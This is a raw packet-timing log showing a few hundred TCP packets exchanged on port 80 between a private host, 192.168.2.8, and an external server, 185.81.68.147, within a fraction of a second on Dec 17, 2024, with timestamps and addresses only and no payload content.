                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.276588917 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.276707888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.276799917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.276913881 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.277622938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.277760029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.277848959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.278704882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.278717041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.278912067 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.279566050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.279999971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.280594110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.280647993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.280719042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.281039000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.281577110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.281651020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.282448053 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.282449961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.282672882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.283164024 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.283802986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.283910990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.284281015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.284444094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.284610987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.284912109 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.285301924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.286360979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.286396027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.286406040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.287167072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.287280083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.287329912 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.287345886 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.288109064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.288316965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.289139032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.289356947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.290043116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.290047884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.290148020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.290335894 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.291222095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.291254044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.291333914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.291333914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.291960001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.292041063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.292968988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.293082952 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.293109894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.293883085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.294281006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.294845104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.294991970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.295331955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.295331955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.295332909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.295723915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.295866013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.296046972 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.296665907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.296821117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.297768116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.297868967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.297956944 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.298033953 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.298717976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.298939943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.299335957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.299562931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.299631119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.300476074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.300594091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.300602913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.301470041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.301587105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.302365065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.302448988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.302989960 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.302989960 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.303384066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.303523064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.304008007 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.304008007 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.304438114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.304546118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.305273056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.306046963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.363666058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.447453022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.447586060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.447901011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.448050976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.448072910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.448359966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.448882103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.449006081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.449117899 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.449851036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.449872017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.450391054 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.450844049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.450931072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.451334000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.451725960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.451837063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.451936007 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.452661037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.452780962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.453001022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.453669071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.453844070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.453952074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.454600096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.454682112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.455075026 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.455513954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.455632925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.456046104 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.456449986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.456568003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.456686974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.457428932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.457581043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.457952023 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.458448887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.458566904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.459328890 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.459614038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.459738970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.460316896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.460407972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.460450888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.460516930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.461253881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.461359978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.461484909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.462197065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.462290049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.463165998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.463279009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.463330030 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.463346958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.464167118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.464276075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.464976072 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.465195894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.465353012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.465584993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.466140032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.466272116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.466540098 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.467046976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.467243910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.467329979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.468161106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.468251944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.468707085 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.469022036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.469202995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.469310045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.469865084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.469923973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.470006943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.470779896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.470834970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.471045017 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.471716881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.471843958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.471925974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.472793102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.472892046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.473176956 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.473609924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.473728895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.473854065 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.474545002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.474621058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.474756002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.475544930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.475708008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.475838900 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.476449013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.476612091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.476725101 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.477478981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.477523088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.477936983 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.478431940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.478502989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.479329109 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.479353905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.479546070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.480045080 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.480334997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.480431080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.480645895 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.481261969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.481375933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.482227087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.482347012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.483124018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.483191013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.483330965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.483330965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.483330965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.484096050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.484203100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.484426022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.485022068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.485131979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.485508919 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.486166000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.486259937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.486545086 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.486987114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.487102985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.487333059 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.487906933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.487987041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.488198996 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.488854885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.488967896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.489041090 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.489881992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.490005970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.490756989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.490874052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.490889072 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.491333008 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.491703987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.491826057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.491955996 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.492688894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.492746115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.492924929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.493613005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.493695974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.493988991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.494613886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.494795084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.495053053 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.495595932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.495733976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.496047974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.496448994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.496613026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.497272015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.497369051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.551985025 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.639605045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.639667034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.640042067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.640074968 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.640140057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.640260935 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.641033888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.641201973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.641377926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.641994953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.642147064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.642498016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.642993927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.643104076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.643362999 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.644123077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.644380093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.645282984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.645330906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.645401955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.645401955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.646156073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.646286964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.646399975 CET4970980192.168.2.8185.81.68.147
